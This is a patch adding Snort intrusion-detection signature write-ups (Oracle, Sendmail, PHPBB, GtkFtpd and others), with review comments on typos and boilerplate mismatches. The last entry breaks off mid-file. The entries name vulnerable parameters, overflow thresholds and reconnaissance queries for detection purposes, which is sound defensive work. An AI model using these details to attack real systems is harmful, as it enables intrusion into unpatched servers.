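Review bot: "ona" in Detailed Information should be "on a", and the line "relationships between the victim server and other hosts can be exploited by the attacker." runs well past the wrap width used by the rest of the file. "attackers choosing" should be "attacker's choosing" in both places.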
--- /dev/null
+++ b/doc/signatures/2557.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2557
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
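Review bot: Detailed Information first attributes the overrun to poor length checking of an "HTTP Header" and then to a large "HTTP Request Method"; the two sentences should agree (Attack Scenarios also says Request Method, with a 432-byte threshold). The Affected Systems version strings contain stray spaces ("9.0.4 .0", "2.0 .0.4", "9.0.2 .3", "9.0.2 .2", "9.0.3 .1") and duplicate the vendor name ("Oracle Oracle9i"). The Corrective Action line lacks a terminating period.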
--- /dev/null
+++ b/doc/signatures/2243.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2243
+
+--
+Summary:
+This event is generated when an attempt is made to access the web cgi
+application ndcgi.exe.
+
+--
+Impact:
+Session hijacking. Unauthorized access to resources.
+
+--
+Detailed Information:
+Certain versions of Netdynamics web application present an attacker with
+the opportunity to steal session IDs and hijack user sessions from the
+information contained in the SPIDERSESSION and uniqueValue variables.
+
+--
+Affected Systems:
+	Netdynamics 4.x through 5.x
+
+--
+Attack Scenarios:
+The attacker can gain the information necessary to login using valid
+user credentials by reading the information contained in the
+SPIDERSESSION and uniqueValue variables.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
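Review bot: Additional References is empty, yet Affected Systems pins a version range (`+	Netdynamics 4.x through 5.x`) and Detailed Information names the SPIDERSESSION and uniqueValue variables; cite the advisory the range came from so readers can verify it. Corrective Action (`+Upgrade to the latest non-affected version of the software.`) also does not say which version is unaffected; state it if the advisory gives one.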
--- /dev/null
+++ b/doc/signatures/119-5.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+119-5
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+
+Impact: 
+Unknown. This may be an attempt to obfuscate an attack an evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the pre-processor http_inspect detects
+base36 encoded characters in a web request. This may be used in an
+attempt to obfuscate an attack against a webserver or to evade an IDS.
+
+--
+Affected Systems:
+	Microsoft IIS web servers (Asian)
+
+--
+Attack Scenarios: 
+An attacker need only encode a web request using base 36 encoding.
+
+-- 
+Ease of Attack: 
+Simple. Exploits exist
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
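Review bot: typo in Impact: `+Unknown. This may be an attempt to obfuscate an attack an evade an IDS.` should read "and evade an IDS". The Affected Systems entry `+	Microsoft IIS web servers (Asian)` is unclear; say which IIS versions or locales "(Asian)" refers to, since Detailed Information only mentions base36 encoded characters. Minor: `+Simple. Exploits exist` is missing its full stop, unlike the other entries.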
--- /dev/null
+++ b/doc/signatures/325.txt
@@ -0,0 +1,65 @@
+Rule:   
+
+--
+Sid: 325
+
+-- 
+
+Summary: 
+This is an intelligence gathering activity.
+
+-- 
+
+Impact: 
+The attacker may obtain a list of accounts existing on the target host.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use a finger command against a host with a username of "0".  A finger query against a vulnerable finger daemon may allow the attacker to obtain a list of accounts on the target system with some details for each account where present (such as time and source of the last login). 
+
+Obtaining a list of accounts might precipitate further attacks such as password guessing, email attacks and other abuse.
+
+--
+
+Attack Scenarios: 
+An attacker learns that the "sys" account exists on the system. He then proceeds to guess the password and is then able to gain remote access to the system.
+
+-- 
+
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS378
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0197
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10069%20(Finger%20zero%20at%20host
+
+--
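Review bot: the Nessus link at the end of Additional References looks truncated: `+http://cgi.nessus.org/plugins/dump.php3?id=10069%20(Finger%20zero%20at%20host` has the plugin title URL-encoded into the id parameter and an unclosed parenthesis; keep only the plugin number in the query and put the title as plain text on the line above. Formatting is also inconsistent with the other files: `+Sid: 325` puts the value on the label line, and the Summary (`+This is an intelligence gathering activity.`) does not follow the "This event is generated when ..." form the rest of the entries use.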
--- /dev/null
+++ b/doc/signatures/2680.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2680
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure subindexpopulate
+. This procedure is included in
+ctxsys.driddlr.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
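Review bot: the Detailed Information paragraph has a line break before the sentence-ending period, leaving a line that is just `+. This procedure is included in`; join it with `+vulnerability in the procedure subindexpopulate` so the sentence reads "... the procedure subindexpopulate. This procedure is included in ctxsys.driddlr." This looks like a template substitution artifact and the same pattern appears in the other Oracle procedure entries in this patch. Additional References is empty; the vendor alert for this procedure would let readers map the event to a patch.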
--- /dev/null
+++ b/doc/signatures/2338.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2338
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in GtkFtpd.
+
+--
+Impact:
+Execution of arbitrary code. Possible unauthorized root access.
+
+--
+Detailed Information:
+GtkFtpd fails to perform sufficient checks on user supplied data to the
+daemon. An attacker may exploit this vulnerability to execute code of
+their choosing as the root user. This may also lead to remote root
+access to the server.
+
+--
+Affected Systems:
+	GtkFtpd 1.0.2, 1.0.3 and 1.0.4
+
+--
+Attack Scenarios:
+An attacker may use a publicly available exploit script to take
+advantage of the vulnerability.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Use scp/sftp as an alternative to ftp.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
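Review bot: Detailed Information says GtkFtpd `+fails to perform sufficient checks on user supplied data to the` / `+daemon.` without saying which input the rule matches on, so a reader cannot tell why a given session raised the event; name the affected command or field as other entries do (the Sendmail entry in this patch names prescan()). Additional References is empty even though Affected Systems lists exact releases (`+	GtkFtpd 1.0.2, 1.0.3 and 1.0.4`); cite the advisory those came from.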
--- /dev/null
+++ b/doc/signatures/1852.txt
@@ -0,0 +1,53 @@
+Rule:  
+
+--
+Sid:
+1852
+--
+Summary:
+This event is generated when an attempt is made to access the file robots.txt directly.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Robots.txt access is usually made by search robots for site indexing. A webmaster sometimes adds information for areas of the site that should not be indexed by the engine. This can include user directories and files and directories used in administration of the server.
+
+The information gathered from robots.txt could be used for system compromise and control of the web server.
+
+--
+Attack Scenarios:
+The attacker could retrieve robots.txt from the server, then discover the path to an unprotected administration interface for the server. The attacker can then gain control of the webserver using this interface.
+
+--
+Ease of Attack:
+Simple. An attacker needs only to find a critical file listed in robots.txt and access it through a browser.
+
+--
+False Positives:
+Many search engine's have robots that check robots.txt for information about the site. This isn't a hack attempt.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Consider using the robots Meta tag in web pages to disallow search engine indexing.
+
+Do not place any sensitive information in the root directory of the webserver. This will negate the need to add these entries to robots.txt.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
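Review bot: the Affected Systems section is missing from this file; every other entry places it between Detailed Information and Attack Scenarios, so add it (something like "Any web server publishing a robots.txt file"). Typo in False Positives: `+Many search engine's have robots that check robots.txt` should read "search engines". Minor formatting: the blank line between `+1852` and the following `--` separator is missing, and Additional References ends with two empty lines before the closing `--`.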
--- /dev/null
+++ b/doc/signatures/184.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+184
+
+--
+Summary:
+Q is a Trojan Horse offering the attacker remote access to the victim 
+host. This event is generated when raw TCP packets are sent to the 
+victim server.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems.
+
+The Trojan is controlled by sending raw packets (TCP/UDP/ICMP) to the 
+victim host containing commands to be run as root.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. The 
+attacker can then choose to send raw data to the victim via TCP/UDP/ICMP
+from the broadcast address of a class C network.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Traffic originating from a broadcast address should not be allowed from 
+external sources or from internal sources to external destinations. 
+Judicious use of firewall rules is necessary.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS202
+
+--
--- /dev/null
+++ b/doc/signatures/100000842.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000842
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "PHPBB 3" application running on a webserver. Access to the file "memberlist.php" with SQL commands being passed as the "ip" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "ip" parameter in the "memberlist.php" script used by the "PHPBB 3" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPBB 3
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
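Review bot: the third paragraph of Detailed Information (`+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. ...`) is the generic credential-validation boilerplate and does not describe the SQL injection via the "ip" parameter that the Summary documents; drop it or replace it with a sentence about how memberlist.php uses that parameter. The same line carries the typo "ona" (should be "on a"). Minor: the file opens with two empty lines, and the `--` after `+All systems running CGI applications using PHPBB 3` lacks the blank line the other entries use.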
--- /dev/null
+++ b/doc/signatures/1548.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1548
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
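Review bot: typo in Detailed Information: `+access to a CGI application running ona web server. Some applications do` should read "on a web server"; the identical boilerplate sentence recurs in the 100000xxx entries in this patch, so fix it in the template rather than per file. Also `+relationships between the victim server and other hosts can be exploited by the attacker.` runs past the wrap width used for the rest of the paragraph.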
--- /dev/null
+++ b/doc/signatures/1785.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+
+1785
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "voyeur".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "voyeur".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
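Review bot: grammar in Summary: `+This rule indicates that a webpage was visited the included the content "voyeur".` should read "that included the content". The Contributors line `+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>` is missing the space before the address, and Additional References holds a run of seven empty lines before the closing `--`; trim them. Minor: "etc.etc." at the end of False Positives should be dropped or written out, and the blank line between `+Sid:` and `+1785` is not used in the other entries.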
--- /dev/null
+++ b/doc/signatures/100000326.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000326
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ScozNet ScozNews" application running on a webserver. Access to the file "admin_edit.php" using a remote file being passed as the "main_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "main_path" parameter in the "admin_edit.php" script used by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
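Review bot: the Attack Scenarios paragraph (`+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. ...`) describes an authentication bypass, not the remote file include through the "main_path" parameter that the Summary and Detailed Information document; the scenario should describe a remote file location being supplied in that parameter, as the Summary already states. The third paragraph of Detailed Information is likewise the generic credential-validation boilerplate and carries the "ona" typo; the file also begins with two empty lines.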
--- /dev/null
+++ b/doc/signatures/2651.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2651
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases have a built-in functions NUMTOYMINTERVAL and
+NUMTODSINTERVAL that are used to convert a number to an interval
+year to month or interval day to second literal.
+
+These functions contain a programming error that may allow an
+attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in the second parameter
+of the function.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string as a value for this command.
+The result could permit the attacker to gain escalated privileges and
+run code of their choosing. This attack requires an attacker to logon
+to the database with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/9587
+
+Other:
+http://www.nextgenss.com/advisories/ora_numtodsinterval.txt
+http://www.nextgenss.com/advisories/ora_numtoyminterval.txt
+
+--
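Review bot: the sentence `+If you are running Oracle on a Windows server, make sure that the` / `+variable $ORACLE_PORTS is set to a value of "any".` is a rule-configuration note, not a description of the vulnerability, and belongs under False Negatives (as the Oracle Web Cache entry earlier in this patch does with its port note); as written, False Negatives says "None known." while the rule can miss traffic if that variable is not set correctly. Grammar: `+vulnerability in a Oracle database implementation.` should be "an Oracle", and `+Oracle databases have a built-in functions NUMTOYMINTERVAL and` should drop the "a". Attack Scenarios refers to the function as "this command"; use "function" for consistency with Detailed Information.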
--- /dev/null
+++ b/doc/signatures/3459.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+3459
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This 
+may be against corporate policy. p2p clients connect to other p2p 
+clients to share files, commonly music and video files but can be 
+configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to 
+transfer company confidential information to unauthorized hosts external
+to the protected network bypassing other security measures in place.
+
+This rule detects activity from Manolito p2p client applications.
+
+--
+Affected Systems:
+	Any host using a Manolito p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
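Review bot: `+Simple.` under Ease of Attack and `+This is indicative of the use of a p2p client.` under Attack Scenarios are fields that the policy entry 1785.txt in this patch fills with "Not an attack." and "N/A."; use the same convention here so informational events are distinguishable from exploit events. Also, only the last line of Detailed Information (`+This rule detects activity from Manolito p2p client applications.`) names the client, while the Summary speaks of p2p clients in general; put the client name in the Summary.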
--- /dev/null
+++ b/doc/signatures/100000744.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000744
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "MyNewsGroups" application running on a webserver. Access to the file "tree.php" with SQL commands being passed as the "grp_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "grp_id" parameter in the "tree.php" script used by the "MyNewsGroups" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MyNewsGroups
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
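Review bot: the third paragraph of Detailed Information (`+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. ...`) is generic credential-validation boilerplate unrelated to the SQL injection via "grp_id" that this entry documents, and it carries the "ona" typo; replace it with a sentence about how tree.php uses that parameter. Minor: the file starts with two empty lines, and the `--` after `+All systems running CGI applications using MyNewsGroups` lacks its preceding blank line.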
--- /dev/null
+++ b/doc/signatures/1751.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1751
+
+--
+Summary:
+This event is generated when a buffer overflow attempt is made against a host using cachefsd.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain remote access to the victim host.
+
+--
+Detailed Information:
+A buffer overflow condition exists in the Cache File System daemon 
+(cachefsd) on certain versions of Solaris for SPARC and x86 
+architectures.
+
+cachefsd is used to improve the performance of NFS servers.
+
+Affected Systems:
+	Solaris 5.5.1, 5.6, 5.7 and 5.8
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable cachefsd.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+AusCERT:
+http://www.auscert.org.au/render.html?it=1918
+
+CERT:
+http://www.kb.cert.org/vuls/id/161931
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0084
+
+
+Bugtraq:
+http://www.securityfocus.com/bid/4631
+
+--
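Review bot: the `--` separator between Detailed Information and Affected Systems is missing: `+cachefsd is used to improve the performance of NFS servers.` is followed by `+Affected Systems:` after a single blank line. Typo in Impact: `+Serious. System compromize presenting the attacker with the opportunity ...` should be "compromise". In Additional References the CVE link `+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0084` sits under the "CERT:" heading; give it its own "CVE:" heading as 325.txt does. Also, `+Exploit scripts are available` under Attack Scenarios repeats the Ease of Attack statement rather than describing a scenario.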
--- /dev/null
+++ b/doc/signatures/2259.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2259
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
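Review bot: Affected Systems (`+All systems using Sendmail.`) is broader than Detailed Information, which limits the bug to `+Sendmail prior` / `+to version 8.12.9`; narrow the entry to versions before 8.12.9, and Corrective Action can then name 8.12.9 instead of `+Upgrade Sendmail to the latest non-affected verison.`, which also has the typo "verison". Additional References is empty; add the advisory the version cut-off came from.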
--- /dev/null
+++ b/doc/signatures/685.txt
@@ -0,0 +1,80 @@
+Rule:  
+
+--
+Sid: 
+685
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+Affected Systems:
+	Microsoft SQL Servers
+
+--
+
+Attack Scenarios: 
